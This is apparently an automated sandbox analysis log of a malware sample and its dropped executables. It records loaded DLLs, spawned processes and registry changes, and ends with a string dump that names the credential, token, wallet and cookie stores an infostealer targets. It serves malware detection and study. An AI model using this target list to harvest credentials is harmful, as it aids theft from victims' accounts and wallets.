Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Section loaded: textinputframework.dll

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1

Source: 2E02vIiMfd.exe

Static file information: File size 1901568 > 1048576

Source: 2E02vIiMfd.exe

Static PE information: Raw size of lzqzkbgd is bigger than: 0x100000 < 0x19e600

Source:	Binary string: C:\AdminC4\Workspace\1654247295\Project\Debug\Project.pdb source: abd4306087.exe, 0000001C.00000000.2340682926.000000000127F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: vdr1.pdb source: Appeal.com, 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: c3d996d758.exe, 00000007.00000002.2718587583.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, a58cbe76b9.exe, 00000020.00000002.3297242480.000000000A080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal 